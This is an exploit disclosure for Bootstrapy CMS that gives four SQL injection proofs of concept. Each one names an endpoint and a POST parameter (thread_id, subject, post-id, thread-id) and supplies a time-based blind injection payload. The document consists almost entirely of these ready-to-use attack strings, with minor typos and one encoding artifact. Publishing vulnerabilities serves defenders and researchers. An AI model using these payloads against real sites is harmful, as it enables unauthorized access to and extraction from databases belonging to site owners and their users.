Exploit Title: Bootstrapy CMS - Multiple SQL Injection
Date: 21.03.2019
Exploit Author: Ahmet Ümit BAYRAM
Vendor Homepage: http://bootstrapy.com
Demo Site: http://bootstrapy.net/demo/
Version: Lastest
Tested on: Kali Linux
CVE: N/A
—– PoC 1: SQLi —–
Request: http://localhost/[PATH]/modules/forums/forum-thread.php Vulnerable Parameter: thread_id (POST) Attack Patten: search=&thread_id=0’XOR(if(now()=sysdate()%2Csleep(5)%2C0))XOR’Z
—– PoC 2: SQLi —–
Request: http://localhost/[PATH]/modules/pages/contact-submit.php Vulnerable Parameter: subject (POST) Attack Pattern: email=sample%40email.tst&message=20&name=wUmrLVWz&subject=0’XOR(if(now()=sysdate()%2Csleep(5)%2C0))XOR’Z&submit=
—– PoC 3 - SQLi —–
Request: http://localhost/[PATH]/modules/forums/post-new-submit.php Vulnerable Parameter: post-id Attack Pattern: body=1&post-id=0’XOR(if(now()=sysdate()%2Csleep(5)%2C0))XOR’Z"e=1&submit=&thread-id=1
—– PoC 4 - SQLi —–
Request: http://localhost/[PATH]/modules/forums/post-new-submit.php Vulnerable Parameter: thread-id (POST) Attack Pattern: quote=0&reply=1&submit=&thread-id=0’XOR(if(now()=sysdate()%2Csleep(0)%2C0))XOR’Z